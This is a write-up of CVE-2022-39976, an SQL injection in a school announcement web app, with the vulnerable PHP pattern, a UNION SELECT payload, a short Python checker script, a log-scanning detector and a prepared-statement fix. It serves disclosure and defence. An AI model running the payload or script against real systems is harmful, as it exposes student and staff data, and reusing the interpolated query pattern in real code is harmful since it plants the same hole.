In the world of educational technology, keeping sensitive student information safe is crucial. A vulnerability like CVE-2022-39976 shows how a simple mistake in web development can lead to serious risks, potentially exposing data or even compromising the school's server.

Discovered in "School Activity Updates with SMS Notification v1.," this CVE spotlights a SQL injection flaw found in the software's announcement editing feature. Let's break down what this means, how it can be exploited, and—importantly—how to fix it.

What is School Activity Updates with SMS Notification v1.?

This is a web application designed for schools. Its main function is to let staff manage and post announcements, sending SMS notifications to students and parents. Users log in, add announcements, and everyone stays updated—sounds great, right? But if there’s a security hole, the whole system is at risk.

The vulnerability affects requests made to

/modules/announcement/index.php?view=edit&id=

Original Disclosure

- Original NVD Entry (nvd.nist.gov)
- Exploit DB reference

How the Vulnerability Works

Insecure handling of user input is the root cause. When editing an announcement, the browser loads this page:

http://<target>/modules/announcement/index.php?view=edit&id=1

The value of id is placed directly into an SQL statement without sanitization. That means a malicious user can inject SQL code.

(Imagine this is inside index.php)

<?php
// Vulnerable pattern: the raw query-string value is interpolated into the SQL text
$id = $_GET['id'];
$sql = "SELECT * FROM announcements WHERE id = $id";
$result = mysqli_query($conn, $sql);
// ... do something with $result ...
?>

Problem: $id comes straight from user input.

A hacker can change the id value to something malicious, like this:

/modules/announcement/index.php?view=edit&id=1 UNION SELECT 1,2,version(),4-- -

What does this do?

The UNION appends a second SELECT to the announcement query, so whatever that second SELECT returns is rendered wherever the announcement fields normally appear. The number of columns in the injected SELECT (four here) has to match the original query, version() returns the database version string, and the trailing -- - comments out any SQL that followed the id. A database version banner showing up in the edit page is therefore the sign that the injection ran.

Here’s a tiny Python script that automates the attack and reveals if the DB is vulnerable:

import requests

# Endpoint under test; the host is the write-up's placeholder
target = "http://victim-site.com/modules/announcement/index.php"
payload = "1 UNION SELECT 1,2,version(),4-- -"
url = f"{target}?view=edit&id={payload}"  # requests percent-encodes the spaces

response = requests.get(url, timeout=10)
# A version banner in the response means the injected SELECT was executed
if "MySQL" in response.text or "MariaDB" in response.text:
    print("Vulnerable to SQL Injection!")
    print("Database info leaked:")
    print(response.text)
else:
    print("No injection evidence.")

Attackers can chain more payloads to dump usernames, passwords, or even gain shell access if more vulnerabilities exist.
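Until a patch is in place, the same request pattern can be spotted from the server side. The following is an added example, not part of the original write-up or the affected project: it parses constructed access-log lines in the common combined format and flags any request to the edit endpoint named above whose id value is not a plain integer. The log lines, function names and constants are this example's own.

```python
"""Added example (not from the original post): flag access-log lines that
hit the vulnerable edit endpoint with an id that is not a plain integer.
The log lines below are constructed; the path is the one the CVE
write-up names.
"""
import re
from urllib.parse import parse_qs, urlsplit

VULN_PATH = "/modules/announcement/index.php"

# Constructed combined-log lines: one legitimate edit, two injection
# attempts, one unrelated view and one attempt against a different path.
SAMPLE_LOG = """\
203.0.113.7 - - [27/Oct/2022:20:15:01 +0000] "GET /modules/announcement/index.php?view=edit&id=1 HTTP/1.1" 200 5123
203.0.113.7 - - [27/Oct/2022:20:15:04 +0000] "GET /modules/announcement/index.php?view=edit&id=1%20UNION%20SELECT%201,2,version(),4--%20- HTTP/1.1" 200 5380
203.0.113.7 - - [27/Oct/2022:20:15:09 +0000] "GET /modules/announcement/index.php?view=edit&id=1' HTTP/1.1" 500 412
198.51.100.2 - - [27/Oct/2022:20:16:00 +0000] "GET /modules/announcement/index.php?view=list HTTP/1.1" 200 7001
198.51.100.2 - - [27/Oct/2022:20:16:03 +0000] "GET /index.php?id=1%20OR%201=1 HTTP/1.1" 200 900
"""

# client ip, identity, user, [timestamp], "METHOD target PROTO", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Return the named fields of one log line, or None if it does not parse."""
    match = LOG_RE.match(line)
    return match.groupdict() if match else None


def suspicious_id(target):
    """Return the decoded id when the request hits the vulnerable endpoint
    with an id that is not all digits; None otherwise. A blank id is ignored."""
    parts = urlsplit(target)
    if parts.path != VULN_PATH:
        return None
    ids = parse_qs(parts.query).get("id")
    if not ids:
        return None
    value = ids[0]  # parse_qs already percent-decodes the value
    return None if value.isdigit() else value


def scan(log_text):
    """Collect (ip, timestamp, status, offending id) for every suspicious hit."""
    hits = []
    for line in log_text.splitlines():
        record = parse_line(line)
        if record is None:
            continue
        bad = suspicious_id(record["target"])
        if bad is not None:
            hits.append((record["ip"], record["ts"], record["status"], bad))
    return hits


if __name__ == "__main__":
    for ip, ts, status, bad in scan(SAMPLE_LOG):
        print(f"{ts} {ip} status={status} id={bad!r}")
```

The rule is deliberately narrow: it keys on the one endpoint the advisory names and on the type the id should have, so it fires on the UNION payload and on a stray quote alike without a keyword list. The last sample line, an attempt against a different script, is not flagged; a generic SQL-keyword rule would be needed for that.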

Here’s a safe version:

<?php
$id = $_GET['id'] ?? 0; // missing id becomes 0 instead of a PHP warning
// The SQL text is fixed; the value is sent separately as a bound parameter
$stmt = $conn->prepare("SELECT * FROM announcements WHERE id = ?");
$stmt->bind_param("i", $id); // "i" for integer: the value is coerced, never parsed as SQL
$stmt->execute();
$result = $stmt->get_result();
?>

Or, at least cast $id to an integer, but prepared statements are best!
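To make the difference between the two PHP versions concrete, here is an added example that is not code from the original post or from the affected project. It models the same announcement lookup three ways against an in-memory SQLite database: interpolated like the vulnerable index.php, bound like the bind_param() fix, and type-checked first as the integer cast suggests. The table, its rows and the function names are constructed here, and sqlite_version() stands in for MySQL's version().

```python
"""Added example, not code from the original post or the affected project:
the announcement lookup modelled three ways against an in-memory SQLite
database, so the effect of the injected id and of the prepared-statement
fix can be observed without a server. The table and rows are constructed.
"""
import sqlite3

# The payload from the write-up, with the SQLite equivalent of version()
PAYLOAD = "1 UNION SELECT 1,2,sqlite_version(),4-- -"


def setup_db():
    """Constructed sample table with four columns, so the UNION lines up."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE announcements ("
        "id INTEGER PRIMARY KEY, title TEXT, body TEXT, created TEXT)"
    )
    conn.executemany(
        "INSERT INTO announcements VALUES (?, ?, ?, ?)",
        [
            (1, "Sports day", "Friday, bring water", "2022-10-01"),
            (2, "Exam week", "Hall B, 9am", "2022-10-05"),
        ],
    )
    return conn


def fetch_vulnerable(conn, raw_id):
    """Mirrors the original index.php: the id is pasted into the SQL text."""
    sql = f"SELECT * FROM announcements WHERE id = {raw_id}"
    return conn.execute(sql).fetchall()


def fetch_parameterized(conn, raw_id):
    """Mirrors bind_param(): the value is bound, never parsed as SQL."""
    return conn.execute(
        "SELECT * FROM announcements WHERE id = ?", (raw_id,)
    ).fetchall()


def fetch_safe(conn, raw_id):
    """Type-check first (the (int) cast the write-up mentions), then bind."""
    if not str(raw_id).isdigit():
        raise ValueError("id must be a positive integer")
    return fetch_parameterized(conn, int(raw_id))


def version_leaked(rows):
    """True when a returned row carries the library version in the body column."""
    return any(row[2] == sqlite3.sqlite_version for row in rows)


if __name__ == "__main__":
    db = setup_db()
    rows = fetch_vulnerable(db, PAYLOAD)
    print(f"vulnerable: {len(rows)} rows, version leaked: {version_leaked(rows)}")
    print("parameterized, same input:", fetch_parameterized(db, PAYLOAD))
    try:
        fetch_safe(db, PAYLOAD)
    except ValueError as err:
        print("safe:", err)
    print("safe, legitimate id:", fetch_safe(db, "1"))
```

Run as a script, the vulnerable build returns an extra row with the database version where an announcement body should be, the parameterized query binds the whole string as one value and matches nothing, and the validated path rejects the input before any query is issued. Whichever way the type is enforced, the SQL text never changes, which is the property the prepared statement gives you.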

Additional References

- Official NVD CVE-2022-39976
- Exploit Database #50935
- OWASP SQL Injection Overview

Final Thoughts

If you’re running School Activity Updates with SMS Notification v1., patch now or update your code. Even small or local systems can be a target. And always, always validate and sanitize any user input. One unsecured field is all it takes!

Timeline

Published on: 10/27/2022 20:15:00 UTC
Last modified on: 10/28/2022 18:56:00 UTC